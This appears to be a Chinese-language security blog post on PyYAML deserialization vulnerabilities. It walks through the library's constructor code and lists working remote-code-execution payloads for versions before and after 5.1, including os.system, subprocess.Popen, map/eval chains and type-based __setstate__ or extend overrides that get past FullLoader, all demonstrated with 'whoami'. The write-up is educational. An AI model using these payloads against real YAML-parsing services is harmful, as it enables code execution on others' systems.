def add_constructor(cls, tag, constructor):
if not 'yaml_constructors' in cls.__dict__:
cls.yaml_constructors = cls.yaml_constructors.copy()
cls.yaml_constructors[tag] = constructor
add_constructor = classmethod(add_constructor)

str对应的函数是 construct_yaml_str,下断点分析

1
2
3
4
5
6
def construct_yaml_str(self, node):
value = self.construct_scalar(node)
try:
return value.encode('ascii')
except UnicodeEncodeError:
return value
1
2
3
4
5
6
def construct_scalar(self, node):
if isinstance(node, MappingNode):
for key_node, value_node in node.value:
if key_node.tag == u'tag:yaml.org,2002:value':
return self.construct_scalar(value_node)
return BaseConstructor.construct_scalar(self, node)
1
2
3
4
5
6
def construct_scalar(self, node):
if not isinstance(node, ScalarNode):
raise ConstructorError(None, None,
"expected a scalar node, but found %s" % node.id,
node.start_mark)
return node.value

可以看到转换的过程,包括node的值

当然除了add_constructor定义的基础类型外还有add_multi_constructor定义的5个complex python tag

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Constructor.add_multi_constructor(
u'tag:yaml.org,2002:python/name:',
Constructor.construct_python_name)

Constructor.add_multi_constructor(
u'tag:yaml.org,2002:python/module:',
Constructor.construct_python_module)

Constructor.add_multi_constructor(
u'tag:yaml.org,2002:python/object:',
Constructor.construct_python_object)

Constructor.add_multi_constructor(
u'tag:yaml.org,2002:python/object/apply:',
Constructor.construct_python_object_apply)

Constructor.add_multi_constructor(
u'tag:yaml.org,2002:python/object/new:',
Constructor.construct_python_object_new)

根据图表可以看到这几个都可以引入新的模块,这正是 PyYAML 存在反序列化漏洞的原因

PyYAML < 5.1

PyYAML 的利用划分以版本 5.1 为界限,5.1以下利用相对较简单,5.1以上利用相对稍麻烦

<5.1的版本中一共有三个构造器,分别是

1
2
3
BaseConstructor:最最基础的构造器,不支持强制类型转换
SafeConstructor:集成 BaseConstructor,强制类型转换和 YAML 规范保持一致,没有魔改
Constructor:在 YAML 规范上新增了很多强制类型转换,是默认使用的构造器

python/object/apply

construct_python_object_apply

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
def construct_python_object_apply(self, suffix, node, newobj=False):
# Format:
# !!python/object/apply # (or !!python/object/new)
# args: [ ... arguments ... ]
# kwds: { ... keywords ... }
# state: ... state ...
# listitems: [ ... listitems ... ]
# dictitems: { ... dictitems ... }
# or short format:
# !!python/object/apply [ ... arguments ... ]
# The difference between !!python/object/apply and !!python/object/new
# is how an object is created, check make_python_instance for details.
if isinstance(node, SequenceNode):
args = self.construct_sequence(node, deep=True)
kwds = {}
state = {}
listitems = []
dictitems = {}
else:
value = self.construct_mapping(node, deep=True)
args = value.get('args', [])
kwds = value.get('kwds', {})
state = value.get('state', {})
listitems = value.get('listitems', [])
dictitems = value.get('dictitems', {})
# 调用 make_python_instance 获取模块中的方法并执行
instance = self.make_python_instance(suffix, node, args, kwds, newobj)
if state:
self.set_python_instance_state(instance, state)
if listitems:
instance.extend(listitems)
if dictitems:
for key in dictitems:
instance[key] = dictitems[key]
return instance

调用 make_python_instance 获取模块中的方法并执行

payload

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# short format形式
# !!python/object/apply [ ... arguments ... ]
yaml.load('!!python/object/apply:os.system ["whoami"]')
yaml.load("!!python/object/apply:os.system ['whoami']")
yaml.load("!!python/object/apply:os.system [whoami]")
yaml.load("!!python/object/apply:subprocess.Popen ['whoami']")


# 其他几种表现形式
yaml.load("exp: !!python/object/apply:os.system [whoami]")

yaml.load("""
exp: !!python/object/apply:os.system
- whoami
""")

yaml.load("""
exp: !!python/object/apply:os.system
args: ["whoami"]
""")

# command 是 os.system 的参数名(可以通过help(os.system)查看)
yaml.load("""
exp: !!python/object/apply:os.system
kwds: {"command": "whoami"}
""")

yaml.load("""
!!python/object/apply:os.system
- whoami
""")

python/object/new

对应的 construct_python_object_new 只有一行代码,调用了construct_python_object_apply

1
2
def construct_python_object_new(self, suffix, node):
return self.construct_python_object_apply(suffix, node, newobj=True)

唯一不同的是newobj参数不一样,这个参数影响了 make_python_instance 中的一个判断

1
2
3
4
if newobj and isinstance(cls, type):
return cls.__new__(cls, *args, **kwds)
else:
return cls(*args, **kwds)

基本不影响,所以 python/object/new 和 python/object/apply 可以看作是同一个

python/object

1
2
3
4
5
6
7
8
def construct_python_object(self, suffix, node):
# Format:
# !!python/object:module.name { ... state ... }
instance = self.make_python_instance(suffix, node, newobj=True)
yield instance
deep = hasattr(instance, '__setstate__')
state = self.construct_mapping(node, deep=deep)
self.set_python_instance_state(instance, state)

执行 make_python_instance 时并没有传 args 或 kwds 参数,所以只能执行无参函数

例如

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import yaml

class User:
def __init__(self):
self.name = ""


payload1 = """!!python/object:__main__.User
name: aaa
"""
payload2 = "!!python/object:__main__.User {name: aaa}"

data1 = yaml.load(payload1)
print(data1.name)

data2 = yaml.load(payload2)
print(data2.name)

'''
aaa
aaa
'''

python/module

代码中只调用了 find_python_module 来导入模块

1
2
3
4
5
6
def construct_python_module(self, suffix, node):
value = self.construct_scalar(node)
if value:
raise ConstructorError("while constructing a Python module", node.start_mark,
"expected the empty value, but found %r" % value, node.start_mark)
return self.find_python_module(suffix, node.start_mark)

虽然 construct_python_module 没有调用逻辑,但是与任意文件上传搭配有奇效

比如在upload目录下上传了恶意文件exp.py

就可以用!!python/module:upload.exp来导入

1
2
3
4
5
6
7
8
import yaml

yaml.load('!!python/module:upload.exp')


'''
root
'''

一个小技巧:
当文件名是 __init__.py 时,直接导入目录名即可,可以绕过.的限制

python/name

代码逻辑与 python/module 非常相似,不过module只返回模块,而name返回模块下的属性和方法

1
2
3
4
5
6
def construct_python_name(self, suffix, node):
value = self.construct_scalar(node)
if value:
raise ConstructorError("while constructing a Python name", node.start_mark,
"expected the empty value, but found %r" % value, node.start_mark)
return self.find_python_name(suffix, node.start_mark)

这个特性常用在获取未知变量的值上

1
2
3
4
5
6
7
8
9
10
import yaml

key = "k1y....."

config = '!!python/name:__main__.key'
print(yaml.load(config))

'''
k1y.....
'''

PyYAML >= 5.1

新增的
1:FullConstructor:默认的构造器。
2:UnsafeConstructor:支持全部的强制类型转换
3:Constructor:等同于 UnsafeConstructor

1
2
3
4
5
6
7
8
__all__ = [
'BaseConstructor',
'SafeConstructor',
'FullConstructor',
'UnsafeConstructor',
'Constructor',
'ConstructorError'
]

如果指定的构造器是 UnsafeConstructor 或者 Constructor ,那么直接用<5.1的方法打就好了

1
2
3
4
5
6
yaml.unsafe_load(exp)
yaml.unsafe_load_all(exp)
yaml.load(exp, Loader=Loader)
yaml.load(exp, Loader=UnsafeLoader)
yaml.load_all(exp, Loader=Loader)
yaml.load_all(exp, Loader=UnsafeLoader)

默认构造器下的利用方式

这里以 PyYAML==5.1 为例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
def make_python_instance(self, suffix, node,
args=None, kwds=None, newobj=False, unsafe=False):
if not args:
args = []
if not kwds:
kwds = {}
cls = self.find_python_name(suffix, node.start_mark)
if not (unsafe or isinstance(cls, type)):
raise ConstructorError("while constructing a Python instance", node.start_mark,
"expected a class, but found %r" % type(cls),
node.start_mark)
if newobj and isinstance(cls, type):
return cls.__new__(cls, *args, **kwds)
else:
return cls(*args, **kwds)

def find_python_name(self, name, mark, unsafe=False):
if not name:
raise ConstructorError("while constructing a Python object", mark,
"expected non-empty name appended to the tag", mark)
if '.' in name:
module_name, object_name = name.rsplit('.', 1)
else:
module_name = 'builtins'
object_name = name
if unsafe:
try:
__import__(module_name)
except ImportError as exc:
raise ConstructorError("while constructing a Python object", mark,
"cannot find module %r (%s)" % (module_name, exc), mark)
if not module_name in sys.modules:
raise ConstructorError("while constructing a Python object", mark,
"module %r is not imported" % module_name, mark)
module = sys.modules[module_name]
if not hasattr(module, object_name):
raise ConstructorError("while constructing a Python object", mark,
"cannot find %r in the module %r"
% (object_name, module.__name__), mark)
return getattr(module, object_name)

可以看到引入了 unsafe ,并且有如下的规则

1
2
3
4
5
if not (unsafe or isinstance(cls, type))
# module.name 必须是一个类

if not module_name in sys.modules
# 限制了导入的module必须在 sys.modules 中

方法一:

最简单的方式就是遍历 sys.modules 字典,找一个满足条件的模块中能执行命令的类

比如 subprocess.Popen

1
yaml.load("!!python/object/apply:subprocess.Popen [whoami]")

方法二:

借助 map 来触发函数执行

例如map(eval, ["__import__('os').system('whoami')"])

需要注意在python2中会直接返回结果,但是在python3中返回的就是一个map对象,需要用一些函数来遍历

1
2
3
4
5
6
# python3
list(map(eval, ["__import__('os').system('whoami')"]))
set(map(eval, ["__import__('os').system('whoami')"]))
tuple(map(eval, ["__import__('os').system('whoami')"]))
frozenset(map(eval, ["__import__('os').system('whoami')"]))
bytes(map(eval, ["__import__('os').system('whoami')"]))

转换成yaml格式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import yaml

# python2
yaml.load("""
!!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('whoami')"]
""")


# python3
yaml.load("""
!!python/object/new:tuple
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('whoami')"]
""")

yaml.load("""
!!python/object/new:frozenset
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('whoami')"]
""")

yaml.full_load("""
!!python/object/new:bytes
- !!python/object/new:map
- !!python/name:eval
- ["__import__('os').system('whoami')"]
""")

这里存在一个问题,在使用!!python/object/new的情况下只能使用 tuple,bytes 等函数来遍历map对象,用 list 或者 set 都不行(当然在 !!python/object/apply 下没有问题)

这是因为上文提到的 python/object/new 与 python/object/apply 的不同之处导致的

当调用 construct_python_object_apply 时会使 newobj 为 true,那么条件就成立了,就会调用 cls.__new__(cls, *args, **kwds)

1
2
3
4
if newobj and isinstance(cls, type):
return cls.__new__(cls, *args, **kwds)
else:
return cls(*args, **kwds)

因为这几个函数的底层实现并不相同,所以部分函数不能使用 __new__ 来传值

其他方法:

继续看 !!python/object/new 的代码,可以发现除了调用 make_python_instance 外还有三个判断,这三个判断在之前的payload中并没有使用,因为并没有传对应的值

1
2
3
4
5
6
7
if state:
self.set_python_instance_state(instance, state)
if listitems:
instance.extend(listitems)
if dictitems:
for key in dictitems:
instance[key] = dictitems[key]

首先是当 listitems 存在,就会触发 instance 下的 extend 方法。那么我们可以创建一个类,在类中添加一个名为 extend 的方法,然后重写成 eval,就相当于 instance.eval(listitems)

1
2
3
# 利用 type 创建一个新的类
a = type("rce", (), {"extend": eval})
a.extend("__import__('os').system('whoami')")

转成YAML

1
2
3
4
5
6
7
8
yaml.full_load("""
!!python/object/new:type
args:
- rce
- !!python/tuple []
- {"extend": !!python/name:eval }
listitems: "__import__('os').system('whoami')"
""")

state 的利用方式也是同样的,通过修改 __setstate__ 达到执行函数的目的(与pickle中的利用__setstate__执行命令类似)

1
2
3
4
5
6
7
8
9
10
11
12
13
def set_python_instance_state(self, instance, state):
if hasattr(instance, '__setstate__'):
instance.__setstate__(state)
else:
slotstate = {}
if isinstance(state, tuple) and len(state) == 2:
state, slotstate = state
if hasattr(instance, '__dict__'):
instance.__dict__.update(state)
elif state:
slotstate.update(state)
for key, value in slotstate.items():
setattr(object, key, value)
1
2
a = type("rce", (), {"__setstate__": eval})
a.__setstate__("__import__('os').system('whoami')")

转为YAML

1
2
3
4
5
6
7
8
yaml.full_load("""
!!python/object/new:type
args:
- rce
- !!python/tuple []
- {"__setstate__": !!python/name:eval }
state: "__import__('os').system('whoami')"
""")

总结:有能调用实例方法的地方,那么就可以构造一个实例,用恶意函数去替换,来执行我们的代码

比如 set_python_instance_state 下的 slotstate.update(state) 也可以rce

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
yaml.full_load("""
!!python/object/new:type
args: []
state: !!python/tuple
- "__import__('os').system('whoami')"
- !!python/object/new:type
args:
- exp
- !!python/tuple []
- {"update": !!python/name:exec , "items": !!python/name:list }
""")

# 另一种写法,用 staticmethod 代替 type
yaml.full_load("""
!!python/object/new:str
args: []
state: !!python/tuple
- "__import__('os').system('whoami')"
- !!python/object/new:staticmethod
args: []
state:
update: !!python/name:eval
items: !!python/name:list
""")

参考文章:
SecMap - 反序列化(Python)
python反序列化详解
Python pickle反序列化浅析
Pickle反序列化
SecMap - 反序列化(PyYAML)


python反序列化
https://www.dr0n.top/posts/ab2b72a2/
作者
dr0n
发布于
2024年1月1日
更新于
2024年4月27日
许可协议